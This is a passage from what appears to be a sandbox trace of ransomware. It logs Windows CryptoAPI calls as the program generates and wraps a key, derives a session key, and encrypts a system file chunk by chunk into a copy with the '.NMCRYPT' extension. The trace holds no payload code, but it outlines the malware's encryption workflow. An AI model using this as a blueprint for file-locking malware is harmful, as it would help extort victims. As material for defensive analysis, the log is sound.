hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.930] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.931] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.931] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.932] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0154.932] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.932] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad1f8) returned 1 [0154.932] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0154.932] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0154.932] wcslen (_String="\\\\?\\") returned 0x4 [0154.932] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0154.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0154.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0154.933] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0154.933] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0154.934] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.935] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.935] GetLastError () returned 0x0 [0154.935] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.936] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.936] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.936] GetLastError () returned 0x0 [0154.936] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.936] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.936] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.936] GetLastError () returned 0x0 [0154.936] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.936] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.936] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.936] GetLastError () returned 0x0 [0154.936] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.936] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.937] GetLastError () returned 0x0 [0154.937] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.937] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.937] GetLastError () returned 0x0 [0154.937] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.937] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.937] GetLastError () returned 0x0 [0154.937] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.937] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.937] GetLastError () returned 0x0 [0154.937] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.937] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.937] GetLastError () returned 0x0 [0154.937] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.937] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.937] GetLastError () returned 0x0 [0154.937] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.937] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.938] GetLastError () returned 0x0 [0154.938] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.938] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.938] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.938] GetLastError () returned 0x0 [0154.938] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.938] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.938] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.938] GetLastError () returned 0x0 [0154.938] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.938] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.938] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.938] GetLastError () returned 0x0 [0154.938] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.938] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.938] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.938] GetLastError () returned 0x0 [0154.938] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, 